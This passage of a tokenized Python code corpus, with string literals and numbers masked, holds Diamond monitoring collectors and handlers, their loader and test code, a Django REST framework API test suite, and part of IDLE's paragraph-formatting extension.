ldap_url , <EOL> self . config [ '<STR_LIT:username>' ] , <EOL> self . config [ '<STR_LIT:password>' ] ) <EOL> except Exception , e : <EOL> self . log . error ( '<STR_LIT>' % ( ldap_url , e ) ) <EOL> return { } <EOL> for name , value in datapoints . items ( ) : <EOL> self . publish ( name , value ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import re <EOL> import time <EOL> import diamond . collector <EOL> import diamond . convertor <EOL> try : <EOL> import psutil <EOL> psutil <EOL> except ImportError : <EOL> psutil = None <EOL> def match_process ( pid , name , cmdline , exe , cfg ) : <EOL> """<STR_LIT>""" <EOL> if cfg [ '<STR_LIT>' ] and pid == os . getpid ( ) : <EOL> return True <EOL> for exe_re in cfg [ '<STR_LIT>' ] : <EOL> if exe_re . search ( exe ) : <EOL> return True <EOL> for name_re in cfg [ '<STR_LIT:name>' ] : <EOL> if name_re . search ( name ) : <EOL> return True <EOL> for cmdline_re in cfg [ '<STR_LIT>' ] : <EOL> if cmdline_re . search ( '<STR_LIT:U+0020>' . join ( cmdline ) ) : <EOL> return True <EOL> return False <EOL> def process_info ( process , info_keys ) : <EOL> results = { } <EOL> process_info = process . as_dict ( ) <EOL> metrics = ( ( key , process_info . get ( key , None ) ) for key in info_keys ) <EOL> for key , value in metrics : <EOL> if type ( value ) in [ float , int ] : <EOL> results . update ( { key : value } ) <EOL> elif hasattr ( value , '<STR_LIT>' ) : <EOL> for subkey , subvalue in value . _asdict ( ) . iteritems ( ) : <EOL> results . update ( { "<STR_LIT>" % ( key , subkey ) : subvalue } ) <EOL> return results <EOL> def get_value ( process , name ) : <EOL> result = getattr ( process , name ) <EOL> try : <EOL> return result ( ) <EOL> except TypeError : <EOL> return result <EOL> class ProcessResourcesCollector ( diamond . collector . Collector ) : <EOL> def process_config ( self ) : <EOL> super ( ProcessResourcesCollector , self ) . process_config ( ) <EOL> """<STR_LIT>""" <EOL> self . processes = { } <EOL> self . processes_info = { } <EOL> for pg_name , cfg in self . config [ '<STR_LIT>' ] . items ( ) : <EOL> pg_cfg = { } <EOL> for key in ( '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' ) : <EOL> pg_cfg [ key ] = cfg . get ( key , [ ] ) <EOL> if not isinstance ( pg_cfg [ key ] , list ) : <EOL> pg_cfg [ key ] = [ pg_cfg [ key ] ] <EOL> pg_cfg [ key ] = [ re . compile ( e ) for e in pg_cfg [ key ] ] <EOL> pg_cfg [ '<STR_LIT>' ] = cfg . get ( '<STR_LIT>' , '<STR_LIT>' ) . lower ( ) == '<STR_LIT:true>' <EOL> pg_cfg [ '<STR_LIT>' ] = cfg . get ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) . lower ( ) == '<STR_LIT:true>' <EOL> self . processes [ pg_name ] = pg_cfg <EOL> self . processes_info [ pg_name ] = { } <EOL> def get_default_config_help ( self ) : <EOL> config_help = super ( ProcessResourcesCollector , <EOL> self ) . get_default_config_help ( ) <EOL> config_help . update ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> } ) <EOL> return config_help <EOL> def get_default_config ( self ) : <EOL> """<STR_LIT>""" <EOL> config = super ( ProcessResourcesCollector , self ) . get_default_config ( ) <EOL> config . update ( { <EOL> '<STR_LIT:path>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:B>' , <EOL> '<STR_LIT>' : { } , <EOL> } ) <EOL> return config <EOL> default_info_keys = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> def save_process_info ( self , pg_name , process_info ) : <EOL> for key , value in process_info . iteritems ( ) : <EOL> if key in self . processes_info [ pg_name ] : <EOL> self . processes_info [ pg_name ] [ key ] += value <EOL> else : <EOL> self . processes_info [ pg_name ] [ key ] = value <EOL> def collect_process_info ( self , process ) : <EOL> try : <EOL> pid = get_value ( process , '<STR_LIT>' ) <EOL> name = get_value ( process , '<STR_LIT:name>' ) <EOL> cmdline = get_value ( process , '<STR_LIT>' ) <EOL> try : <EOL> exe = get_value ( process , '<STR_LIT>' ) <EOL> except psutil . AccessDenied : <EOL> exe = "<STR_LIT>" <EOL> for pg_name , cfg in self . processes . items ( ) : <EOL> if match_process ( pid , name , cmdline , exe , cfg ) : <EOL> pi = process_info ( process , self . default_info_keys ) <EOL> if cfg [ '<STR_LIT>' ] : <EOL> pi . update ( { '<STR_LIT>' : <NUM_LIT:1> } ) <EOL> uptime = time . time ( ) - getattr ( process , '<STR_LIT>' ) <EOL> pi . update ( { '<STR_LIT>' : uptime } ) <EOL> self . save_process_info ( pg_name , pi ) <EOL> except psutil . NoSuchProcess , e : <EOL> self . log . info ( "<STR_LIT>" , e ) <EOL> def collect ( self ) : <EOL> """<STR_LIT>""" <EOL> if not psutil : <EOL> self . log . error ( '<STR_LIT>' ) <EOL> self . log . error ( '<STR_LIT>' ) <EOL> return None <EOL> for process in psutil . process_iter ( ) : <EOL> self . collect_process_info ( process ) <EOL> for pg_name , counters in self . processes_info . iteritems ( ) : <EOL> metrics = ( <EOL> ( "<STR_LIT>" % ( pg_name , key ) , value ) <EOL> for key , value in counters . iteritems ( ) ) <EOL> [ self . publish ( * metric ) for metric in metrics ] <EOL> self . processes_info [ pg_name ] = { } </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import sys <EOL> import time <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . join ( os . path . dirname ( os . path . dirname ( __file__ ) ) , <EOL> '<STR_LIT>' ) ) <EOL> from snmp import SNMPCollector as parent_SNMPCollector <EOL> from diamond . metric import Metric <EOL> class SNMPRawCollector ( parent_SNMPCollector ) : <EOL> def process_config ( self ) : <EOL> super ( SNMPRawCollector , self ) . process_config ( ) <EOL> self . skip_list = [ ] <EOL> def get_default_config ( self ) : <EOL> """<STR_LIT>""" <EOL> default_config = super ( SNMPRawCollector , <EOL> self ) . get_default_config ( ) <EOL> default_config . update ( { <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> return default_config <EOL> def _precision ( self , value ) : <EOL> """<STR_LIT>""" <EOL> value = str ( value ) <EOL> decimal = value . rfind ( '<STR_LIT:.>' ) <EOL> if decimal == - <NUM_LIT:1> : <EOL> return <NUM_LIT:0> <EOL> return len ( value ) - decimal - <NUM_LIT:1> <EOL> def _skip ( self , device , oid , reason = None ) : <EOL> self . skip_list . append ( ( device , oid ) ) <EOL> if reason is not None : <EOL> self . log . warn ( '<STR_LIT>' . format ( <EOL> oid , device , reason ) ) <EOL> def _get_value_walk ( self , device , oid , host , port , community ) : <EOL> data = self . walk ( oid , host , port , community ) <EOL> if data is None : <EOL> self . _skip ( device , oid , '<STR_LIT>' ) <EOL> return <EOL> self . log . debug ( '<STR_LIT>' . format ( <EOL> device , data ) ) <EOL> if len ( data ) != <NUM_LIT:1> : <EOL> self . _skip ( <EOL> device , <EOL> oid , <EOL> '<STR_LIT>' . format ( <EOL> len ( data ) ) ) <EOL> return <EOL> value = data . items ( ) [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] <EOL> return value <EOL> def _get_value ( self , device , oid , host , port , community ) : <EOL> data = self . get ( oid , host , port , community ) <EOL> if data is None : <EOL> self . _skip ( device , oid , '<STR_LIT>' ) <EOL> return <EOL> self . log . debug ( '<STR_LIT>' . format ( <EOL> device , data ) ) <EOL> if len ( data ) == <NUM_LIT:0> : <EOL> self . _skip ( device , oid , '<STR_LIT>' ) <EOL> return <EOL> if oid not in data : <EOL> self . _skip ( device , oid , '<STR_LIT>' ) <EOL> return <EOL> value = data [ oid ] <EOL> if value == '<STR_LIT>' : <EOL> self . _skip ( device , oid , '<STR_LIT>' ) <EOL> return <EOL> if value == '<STR_LIT>' : <EOL> return self . _get_value_walk ( device , oid , host , port , community ) <EOL> return value <EOL> def collect_snmp ( self , device , host , port , community ) : <EOL> """<STR_LIT>""" <EOL> self . log . debug ( <EOL> '<STR_LIT>' . format ( device ) ) <EOL> dev_config = self . config [ '<STR_LIT>' ] [ device ] <EOL> if '<STR_LIT>' in dev_config : <EOL> for oid , metricName in dev_config [ '<STR_LIT>' ] . items ( ) : <EOL> if ( device , oid ) in self . skip_list : <EOL> self . log . debug ( <EOL> '<STR_LIT>' . format ( <EOL> oid , metricName , device ) ) <EOL> continue <EOL> timestamp = time . time ( ) <EOL> value = self . _get_value ( device , oid , host , port , community ) <EOL> if value is None : <EOL> continue <EOL> self . log . debug ( <EOL> '<STR_LIT>' . format ( <EOL> oid , metricName , device , value ) ) <EOL> path = '<STR_LIT:.>' . join ( [ self . config [ '<STR_LIT>' ] , device , <EOL> self . config [ '<STR_LIT>' ] , metricName ] ) <EOL> metric = Metric ( path = path , value = value , timestamp = timestamp , <EOL> precision = self . _precision ( value ) , <EOL> metric_type = '<STR_LIT>' ) <EOL> self . publish_metric ( metric ) </s>
<s> from test import CollectorTestCase <EOL> from test import get_collector_config <EOL> from test import unittest <EOL> from mock import Mock <EOL> from mock import patch <EOL> from diamond . collector import Collector <EOL> from varnish import VarnishCollector <EOL> class TestVarnishCollector ( CollectorTestCase ) : <EOL> def setUp ( self ) : <EOL> config = get_collector_config ( '<STR_LIT>' , { } ) <EOL> self . collector = VarnishCollector ( config , None ) <EOL> def test_import ( self ) : <EOL> self . assertTrue ( VarnishCollector ) <EOL> @ patch . object ( Collector , '<STR_LIT>' ) <EOL> def test_should_work_with_real_data ( self , publish_mock ) : <EOL> collector_mock = patch . object ( VarnishCollector , '<STR_LIT>' , Mock ( <EOL> return_value = self . getFixture ( '<STR_LIT>' ) . getvalue ( ) ) ) <EOL> collector_mock . start ( ) <EOL> self . collector . collect ( ) <EOL> collector_mock . stop ( ) <EOL> metrics = { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:9> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:10> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:10> , <EOL> '<STR_LIT>' : <NUM_LIT:10> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> } <EOL> self . setDocExample ( collector = self . collector . __class__ . __name__ , <EOL> metrics = metrics , <EOL> defaultpath = self . collector . config [ '<STR_LIT:path>' ] ) <EOL> self . assertPublishedMany ( publish_mock , metrics ) <EOL> @ patch . object ( Collector , '<STR_LIT>' ) <EOL> def test_should_fail_gracefully ( self , publish_mock ) : <EOL> collector_mock = patch . object ( VarnishCollector , '<STR_LIT>' , Mock ( <EOL> return_value = self . getFixture ( <EOL> '<STR_LIT>' ) . getvalue ( ) ) ) <EOL> collector_mock . start ( ) <EOL> self . collector . collect ( ) <EOL> collector_mock . stop ( ) <EOL> self . assertPublishedMany ( publish_mock , { } ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> from Handler import Handler <EOL> import urllib2 <EOL> class HttpPostHandler ( Handler ) : <EOL> def __init__ ( self , config = None ) : <EOL> Handler . __init__ ( self , config ) <EOL> self . metrics = [ ] <EOL> self . batch_size = int ( self . config [ '<STR_LIT>' ] ) <EOL> self . url = self . config . get ( '<STR_LIT:url>' ) <EOL> def get_default_config_help ( self ) : <EOL> """<STR_LIT>""" <EOL> config = super ( HttpPostHandler , self ) . get_default_config_help ( ) <EOL> config . update ( { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> return config <EOL> def get_default_config ( self ) : <EOL> """<STR_LIT>""" <EOL> config = super ( HttpPostHandler , self ) . get_default_config ( ) <EOL> config . update ( { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:100> , <EOL> } ) <EOL> return config <EOL> def process ( self , metric ) : <EOL> self . metrics . append ( str ( metric ) ) <EOL> if len ( self . metrics ) >= self . batch_size : <EOL> self . post ( ) <EOL> def flush ( self ) : <EOL> """<STR_LIT>""" <EOL> self . post ( ) <EOL> def post ( self ) : <EOL> req = urllib2 . Request ( self . url , "<STR_LIT:\n>" . join ( self . metrics ) ) <EOL> urllib2 . urlopen ( req ) <EOL> self . metrics = [ ] </s>
<s> import configobj <EOL> import os <EOL> import sys <EOL> import logging <EOL> import inspect <EOL> import traceback <EOL> from diamond . util import load_class_from_name <EOL> from diamond . collector import Collector <EOL> from diamond . handler . Handler import Handler <EOL> def load_include_path ( paths ) : <EOL> """<STR_LIT>""" <EOL> for path in paths : <EOL> if not os . path . isdir ( path ) : <EOL> continue <EOL> if path not in sys . path : <EOL> sys . path . insert ( <NUM_LIT:1> , path ) <EOL> for f in os . listdir ( path ) : <EOL> fpath = os . path . join ( path , f ) <EOL> if os . path . isdir ( fpath ) : <EOL> load_include_path ( [ fpath ] ) <EOL> def load_dynamic_class ( fqn , subclass ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( fqn , basestring ) : <EOL> return fqn <EOL> cls = load_class_from_name ( fqn ) <EOL> if cls == subclass or not issubclass ( cls , subclass ) : <EOL> raise TypeError ( "<STR_LIT>" % ( fqn , subclass . __name__ ) ) <EOL> return cls <EOL> def load_handlers ( config , handler_names ) : <EOL> """<STR_LIT>""" <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> handlers = [ ] <EOL> if isinstance ( handler_names , basestring ) : <EOL> handler_names = [ handler_names ] <EOL> for handler in handler_names : <EOL> log . debug ( '<STR_LIT>' , handler ) <EOL> try : <EOL> cls = load_dynamic_class ( handler , Handler ) <EOL> cls_name = cls . __name__ <EOL> handler_config = configobj . ConfigObj ( ) <EOL> handler_config . merge ( config [ '<STR_LIT>' ] [ '<STR_LIT:default>' ] ) <EOL> if cls_name in config [ '<STR_LIT>' ] : <EOL> handler_config . merge ( config [ '<STR_LIT>' ] [ cls_name ] ) <EOL> if '<STR_LIT>' in config [ '<STR_LIT>' ] : <EOL> configfile = os . path . join ( <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> cls_name ) + '<STR_LIT>' <EOL> if os . path . exists ( configfile ) : <EOL> handler_config . merge ( configobj . ConfigObj ( configfile ) ) <EOL> h = cls ( handler_config ) <EOL> handlers . append ( h ) <EOL> except ( ImportError , SyntaxError ) : <EOL> log . warning ( "<STR_LIT>" , <EOL> handler , <EOL> traceback . format_exc ( ) ) <EOL> continue <EOL> return handlers <EOL> def load_collectors ( paths = None , filter = None ) : <EOL> """<STR_LIT>""" <EOL> collectors = { } <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> if paths is None : <EOL> return <EOL> if isinstance ( paths , basestring ) : <EOL> paths = paths . split ( '<STR_LIT:U+002C>' ) <EOL> paths = map ( str . strip , paths ) <EOL> load_include_path ( paths ) <EOL> for path in paths : <EOL> if not os . path . exists ( path ) : <EOL> raise OSError ( "<STR_LIT>" % path ) <EOL> if path . endswith ( '<STR_LIT>' ) or path . endswith ( '<STR_LIT>' ) : <EOL> return collectors <EOL> for f in os . listdir ( path ) : <EOL> fpath = os . path . join ( path , f ) <EOL> if os . path . isdir ( fpath ) : <EOL> subcollectors = load_collectors ( [ fpath ] ) <EOL> for key in subcollectors : <EOL> collectors [ key ] = subcollectors [ key ] <EOL> elif ( os . path . isfile ( fpath ) <EOL> and len ( f ) > <NUM_LIT:3> <EOL> and f [ - <NUM_LIT:3> : ] == '<STR_LIT>' <EOL> and f [ <NUM_LIT:0> : <NUM_LIT:4> ] != '<STR_LIT:test>' <EOL> and f [ <NUM_LIT:0> ] != '<STR_LIT:.>' ) : <EOL> if filter and os . path . join ( path , f ) != filter : <EOL> continue <EOL> modname = f [ : - <NUM_LIT:3> ] <EOL> try : <EOL> mod = __import__ ( modname , globals ( ) , locals ( ) , [ '<STR_LIT:*>' ] ) <EOL> except ( KeyboardInterrupt , SystemExit ) as err : <EOL> log . error ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % modname ) <EOL> if isinstance ( err , SystemExit ) : <EOL> sys . exit ( err . code ) <EOL> raise KeyboardInterrupt <EOL> except : <EOL> log . error ( "<STR_LIT>" , <EOL> modname , <EOL> traceback . format_exc ( ) ) <EOL> continue <EOL> for attrname in dir ( mod ) : <EOL> attr = getattr ( mod , attrname ) <EOL> if ( inspect . isclass ( attr ) <EOL> and issubclass ( attr , Collector ) <EOL> and attr != Collector ) : <EOL> if attrname . startswith ( '<STR_LIT>' ) : <EOL> continue <EOL> fqcn = '<STR_LIT:.>' . join ( [ modname , attrname ] ) <EOL> try : <EOL> cls = load_dynamic_class ( fqcn , Collector ) <EOL> collectors [ cls . __name__ ] = cls <EOL> except Exception : <EOL> log . error ( <EOL> "<STR_LIT>" , <EOL> fqcn , traceback . format_exc ( ) ) <EOL> continue <EOL> return collectors <EOL> def initialize_collector ( cls , name = None , configfile = None , handlers = [ ] ) : <EOL> """<STR_LIT>""" <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> collector = None <EOL> try : <EOL> collector = cls ( name = name , configfile = configfile , handlers = handlers ) <EOL> except Exception : <EOL> log . error ( "<STR_LIT>" , <EOL> cls . __name__ , traceback . format_exc ( ) ) <EOL> return collector </s>
<s> from rest_framework . test import APITestCase <EOL> from django . core . management import call_command <EOL> from django . core . management . base import CommandError <EOL> class BaseTestCase ( APITestCase ) : <EOL> def init_data ( self ) : <EOL> self . url = '<STR_LIT>' <EOL> self . good_url = '<STR_LIT>' <EOL> self . good_data = { "<STR_LIT:title>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT:test>" , "<STR_LIT:content>" : "<STR_LIT:test>" } <EOL> self . bad_url = '<STR_LIT>' <EOL> self . bad_data = { "<STR_LIT>" : <NUM_LIT> , "<STR_LIT>" : "<STR_LIT:test>" , "<STR_LIT:content>" : "<STR_LIT>" } <EOL> def generate_api ( self , format ) : <EOL> args = [ '<STR_LIT>' ] <EOL> opts = { '<STR_LIT>' : format , '<STR_LIT>' : True } <EOL> call_command ( '<STR_LIT>' , * args , ** opts ) <EOL> self . init_data ( ) <EOL> def set_up ( self ) : <EOL> response = self . client . post ( self . url , self . good_data , format = '<STR_LIT>' ) <EOL> return ( response , self . good_data ) <EOL> def create_post ( self ) : <EOL> response , data = self . set_up ( ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> self . assertEqual ( response . data [ "<STR_LIT:title>" ] , data [ "<STR_LIT:title>" ] ) <EOL> self . assertEqual ( response . data [ "<STR_LIT>" ] , data [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( response . data [ "<STR_LIT:content>" ] , data [ "<STR_LIT:content>" ] ) <EOL> def create_post_error ( self ) : <EOL> response = self . client . post ( self . url , self . bad_data , format = '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def list_post ( self ) : <EOL> self . set_up ( ) <EOL> response = self . client . get ( self . url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> def retrieve_post ( self ) : <EOL> self . set_up ( ) <EOL> response = self . client . get ( self . good_url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( response . data [ "<STR_LIT:title>" ] , "<STR_LIT>" ) <EOL> def retrieve_post_error ( self ) : <EOL> response = self . client . get ( self . bad_url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def update_post ( self ) : <EOL> self . set_up ( ) <EOL> response = self . client . put ( self . good_url , self . good_data , format = '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( response . data [ "<STR_LIT:content>" ] , self . good_data [ "<STR_LIT:content>" ] ) <EOL> def update_post_error ( self ) : <EOL> response = self . client . put ( self . bad_url , self . good_data , format = '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> self . set_up ( ) <EOL> response = self . client . put ( self . good_url , self . bad_data , format = '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def delete_post ( self ) : <EOL> self . set_up ( ) <EOL> response = self . client . delete ( self . good_url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def delete_post_error ( self ) : <EOL> response = self . client . delete ( self . good_url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def run_tests ( self , type ) : <EOL> print ( '<STR_LIT>' . format ( type ) ) <EOL> self . generate_api ( type ) <EOL> self . create_post ( ) <EOL> self . create_post_error ( ) <EOL> self . list_post ( ) <EOL> self . retrieve_post ( ) <EOL> self . retrieve_post_error ( ) <EOL> self . update_post ( ) <EOL> self . update_post_error ( ) <EOL> self . delete_post ( ) <EOL> self . delete_post_error ( ) <EOL> class APIViewTest ( BaseTestCase ) : <EOL> def test_apiview ( self ) : <EOL> self . run_tests ( '<STR_LIT>' ) <EOL> class FunctionViewTest ( BaseTestCase ) : <EOL> def test_function ( self ) : <EOL> self . run_tests ( '<STR_LIT>' ) <EOL> class ViewSetTest ( BaseTestCase ) : <EOL> def test_viewset ( self ) : <EOL> self . run_tests ( '<STR_LIT>' ) <EOL> class ModelViewSetTest ( BaseTestCase ) : <EOL> def test_modelviewset ( self ) : <EOL> self . run_tests ( '<STR_LIT>' ) <EOL> class EdgeCaseTest ( BaseTestCase ) : <EOL> def test_invalid_format ( self ) : <EOL> try : <EOL> self . generate_api ( '<STR_LIT>' ) <EOL> except Exception as e : <EOL> self . assertTrue ( isinstance ( e , CommandError ) ) </s>
<s> import re <EOL> from configHandler import idleConf <EOL> class FormatParagraph : <EOL> menudefs = [ <EOL> ( '<STR_LIT>' , [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] ) <EOL> ] <EOL> def __init__ ( self , editwin ) : <EOL> self . editwin = editwin <EOL> def close ( self ) : <EOL> self . editwin = None <EOL> def format_paragraph_event ( self , event ) : <EOL> maxformatwidth = int ( idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> text = self . editwin . text <EOL> first , last = self . editwin . get_selection_indices ( ) <EOL> if first and last : <EOL> data = text . get ( first , last ) <EOL> comment_header = '<STR_LIT>' <EOL> else : <EOL> first , last , comment_header , data = find_paragraph ( text , text . index ( "<STR_LIT>" ) ) <EOL> if comment_header : <EOL> lines = data . split ( "<STR_LIT:\n>" ) <EOL> lines = map ( lambda st , l = len ( comment_header ) : st [ l : ] , lines ) <EOL> data = "<STR_LIT:\n>" . join ( lines ) <EOL> format_width = max ( maxformatwidth - len ( comment_header ) , <NUM_LIT:20> ) <EOL> newdata = reformat_paragraph ( data , format_width ) <EOL> newdata = newdata . split ( "<STR_LIT:\n>" ) <EOL> block_suffix = "<STR_LIT>" <EOL> if not newdata [ - <NUM_LIT:1> ] : <EOL> block_suffix = "<STR_LIT:\n>" <EOL> newdata = newdata [ : - <NUM_LIT:1> ] <EOL> builder = lambda item , prefix = comment_header : prefix + item <EOL> newdata = '<STR_LIT:\n>' . join ( map ( builder , newdata ) ) + block_suffix <EOL> else : <EOL> newdata = reformat_paragraph ( data , maxformatwidth ) <EOL> text . tag_remove ( "<STR_LIT>" , "<STR_LIT:1.0>" , "<STR_LIT:end>" ) <EOL> if newdata != data : <EOL> text . mark_set ( "<STR_LIT>" , first ) <EOL> text . undo_block_start ( ) <EOL> text . delete ( first , last ) <EOL> text . insert ( first , newdata ) <EOL> text . undo_block_stop ( ) <EOL> else : <EOL> text . mark_set ( "<STR_LIT>" , last ) <EOL> text . see ( "<STR_LIT>" ) <EOL> return "<STR_LIT>" <EOL> def find_paragraph ( text , mark ) : <EOL> lineno , col = map ( int , mark . split ( "<STR_LIT:.>" ) ) <EOL> line = text . get ( "<STR_LIT>" % lineno , "<STR_LIT>" % lineno ) <EOL> while text . compare ( "<STR_LIT>" % lineno , "<STR_LIT:<>" , "<STR_LIT:end>" ) and is_all_white ( line ) : <EOL> lineno = lineno + <NUM_LIT:1> <EOL> line = text . get ( "<STR_LIT>" % lineno , "<STR_LIT>" % lineno ) <EOL> first_lineno = lineno <EOL> comment_header = get_comment_header ( line ) <EOL> comment_header_len = len ( comment_header ) <EOL> while get_comment_header ( line ) == comment_header and not is_all_white ( line [ comment_header_len : ] ) : <EOL> lineno = lineno + <NUM_LIT:1> <EOL> line = text . get ( "<STR_LIT>" % lineno , "<STR_LIT>" % lineno ) <EOL> last = "<STR_LIT>" % lineno <EOL> lineno = first_lineno - <NUM_LIT:1> <EOL> line = text . get ( "<STR_LIT>" % lineno , "<STR_LIT>" % lineno ) <EOL> while lineno > <NUM_LIT:0> and get_comment_header ( line ) == comment_header and not is_all_white ( line [ comment_header_len : ] ) : <EOL> lineno = lineno - <NUM_LIT:1> <EOL> line = text . get ( "<STR_LIT>" % lineno , "<STR_LIT>" % lineno ) <EOL> first = "<STR_LIT>" % ( lineno + <NUM_LIT:1> ) <EOL> return first , last , comment_header , text . get ( first , last ) <EOL> def reformat_paragraph ( data , limit ) : <EOL> lines = data . split ( 